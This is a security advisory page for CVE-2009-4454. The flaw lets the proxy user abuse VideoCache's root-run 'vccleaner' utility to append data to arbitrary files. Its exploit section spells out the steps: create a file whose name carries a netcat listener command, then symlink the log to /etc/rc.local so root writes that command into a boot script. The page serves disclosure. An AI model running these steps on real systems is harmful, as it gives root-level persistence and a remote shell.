|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 6892 CVE : CVE-2009-4454 CWE : CWE-59 SecurityRisk : Medium  (About) Remote Exploit : No Local Exploit : Yes Victim interaction required : No Exploit Available : Yes Credit : Dominick LaTrappe Published : 30.12.2009
Advisory Content : ====[ SYNOPSIS ]===================================================== VideoCache is a Squid URL rewriter plugin written in Python for bandwidth optimization while browsing video sharing websites. Version 1.9.2 allows a user with the privileges of the Squid proxy server to append semi-arbitrary data to arbitrary files with root privileges, upon the administrator's execution of the 'vccleaner' utility. ====[ DISCUSSION ]=================================================== VideoCache's 'vccleaner' utility is intended to be executed with root permissions periodically, to remove expired videos from the cache. (The utility will refuse to execute without root permissions.) Upon execution, it looks for old files under the cache directory /var/spool/videocache (writable by the Squid proxy user) and deletes them. Each deleted filename is logged to vccleaner.log, located in /var/log/videocache (directory writable by the Squid proxy user). ====[ EXPLOIT ]====================================================== .........................attacker......................... $ id uid=13(proxy) gid=13(proxy) groups=13(proxy) $ cd /var/log/videocache $ touch -d 19700101 "/var/spool/videocache/youtube/money > nc -l -p 31337 -c sushi > monkey" $ rm -f vccleaner.log $ ln -s /etc/rc.local vccleaner.log .........................admin......................... # id uid=0(root) gid=0(root) groups=0(root) # vccleaner Videocache cleaning has completed successfully. .........................postmortem......................... $ cat /etc/rc.local 2009-12-16 06:56:29,403 INFO START Starting Videocache Cleaner. 2009-12-16 06:56:29,403 INFO DELETE /var/spool/videocache/youtube/money nc -l -p 31337 -c sushi monkey Older than 14594 day(s) was deleted. 2009-12-16 06:56:29,404 INFO STOP Stopping Videocache Cleaner. ====[ SHOUT OUTS ]=================================================== Tim, Ben, my buddies at GS, Alien Time Agent, and big man O. References : http://xforce.iss.net/xforce/xfdb/54916
http://www.securityfocus.com/archive/1/archive/1/508507/100/0/threaded
http://secunia.com/advisories/37733
http://archives.neohapsis.com/archives/fulldisclosure/2009-12/0366.html  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |